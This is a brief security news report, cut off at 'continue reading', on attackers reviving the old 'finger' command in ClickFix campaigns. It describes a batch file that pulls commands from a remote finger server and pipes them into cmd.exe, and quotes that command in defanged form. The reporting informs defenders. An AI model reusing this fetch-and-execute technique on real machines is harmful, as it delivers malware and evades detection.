The decades-old "finger" command is making a comeback,, with threat actors using the protocol to retrieve remote commands to execute on Windows devices.
In the past, people used the finger command to look up information about local and remote users on Unix and Linux systems via the Finger protocol, a command later added to Windows. While still supported, it's rarely used today compared to its popularity decades ago.
When executed, the finger command returns basic information about a user, including their login name, name (if set in /etc/passwd), home directory, phone numbers, last seen, and other details.
Finger command output
Source: BleepingComputer
Recently, there have been malicious campaigns utilizing the Finger protocol in what appear to be ClickFix attacks that retrieve commands to execute on devices.
This is not the first time the finger command has been abused in this way, as researchers warned in 2020 that it was used as a LOLBIN to download malware and evade detection.
Abusing the finger command
Last month, cybersecurity researcher MalwareHunterTeam shared a batch file [VirusTotal] with BleepingComputer that, when executed, would use the " finger [email protected][.]com " command to retrieve commands from a remote finger server, which were then run locally by piping them through cmd.exe.
Batch file running the finger command to retrieve a script
... continue reading